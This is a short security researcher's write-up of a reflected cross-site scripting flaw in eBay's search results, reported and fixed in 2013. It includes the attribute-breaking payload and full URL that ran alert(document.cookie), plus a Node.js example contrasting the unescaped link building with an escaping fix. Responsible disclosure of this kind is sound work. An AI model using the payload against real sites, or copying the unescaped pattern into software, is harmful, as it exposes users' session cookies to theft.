The first place where I started looking for a JavaScript code injection on ebay.com was a search box. Surprisingly, it was a bull’s eye.
I typed “Gold” and hit the “Search” button. I was redirected to:
http://www.ebay.com/sch/i.html?_trksid=m570.l1313&_nkw=gold&_sacat=0&_from=R40
Then I looked at the page source. It seemed that every checkbox (e.g. “Auction”, “Buy It Now” and so on) had a dynamically generated URL:
<a href="http://www.ebay.com/sch/i.html?_from=R40&_sacat=0&_nkw=gold&rt=nc&LH_Auction=1">
What I found interesting was the part after the search query (“gold”) that was absent from the web browser’s address bar:
&rt=nc&LH_Auction=1
So I simply tried to abuse it with a value of:
" onclick=alert(document.cookie) x="
In the address bar of my web browser I typed:
http://www.ebay.com/sch/i.html?_from=R40&_sacat=0&_nkw=gold&rt=" onclick=alert(document.cookie) x="
After clicking the “Auction” or “Buy It Now” checkbox, my cookies showed up in an alert box.
Voilà!
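The mechanism above, as an added Node.js example that is not eBay’s code: the vulnerable pattern (the rt query parameter concatenated unescaped into the checkbox link’s href attribute, so a double quote closes the attribute early) beside a hardened version that attribute-encodes every reflected value, both fed the URL quoted above. The function names (parseSearchParams, buildAuctionLinkUnsafe, buildAuctionLinkSafe, escapeAttr, hrefClosedEarly) are my own and assume nothing about eBay’s real server code.

```javascript
// Added example, not eBay's code: the reflected-parameter pattern behind the
// bug, beside the attribute-encoding fix. Function names are assumed.

// The URL from the post, with the payload in the "rt" parameter (constructed input).
const SAMPLE_URL =
  'http://www.ebay.com/sch/i.html?_from=R40&_sacat=0&_nkw=gold&rt=" onclick=alert(document.cookie) x="';

// Decode the query string the way a server would (WHATWG URL parser).
function parseSearchParams(url) {
  return Object.fromEntries(new URL(url).searchParams);
}

// Vulnerable pattern: query values are concatenated straight into the href
// attribute, so a '"' in rt closes the attribute early and whatever follows
// becomes new attributes on the <a> element.
function buildAuctionLinkUnsafe(p) {
  return `<a href="http://www.ebay.com/sch/i.html?_nkw=${p._nkw}&rt=${p.rt}&LH_Auction=1">Auction</a>`;
}

// Fix: escape every reflected value for the HTML attribute context.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

function buildAuctionLinkSafe(p) {
  const nkw = escapeAttr(p._nkw || "");
  const rt = escapeAttr(p.rt || "");
  return `<a href="http://www.ebay.com/sch/i.html?_nkw=${nkw}&amp;rt=${rt}&amp;LH_Auction=1">Auction</a>`;
}

// Check used in the demo: did the href value end before the tag did, leaving
// an onclick attribute outside it?
function hrefClosedEarly(html) {
  const hrefStart = html.indexOf('href="') + 6;
  const hrefEnd = html.indexOf('"', hrefStart);
  const rest = html.slice(hrefEnd + 1, html.indexOf(">", hrefEnd));
  return /\bonclick=/.test(rest);
}

const params = parseSearchParams(SAMPLE_URL);
console.log("unsafe breaks out:", hrefClosedEarly(buildAuctionLinkUnsafe(params))); // true
console.log("safe breaks out:  ", hrefClosedEarly(buildAuctionLinkSafe(params)));   // false
```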
This got me listed on eBay’s Security Researchers Acknowledgement page.
Bug’s lifespan:
[January 23rd 2013] - first report
[March 5th 2013] - second report after no response
[April 2nd 2013] - bug fixed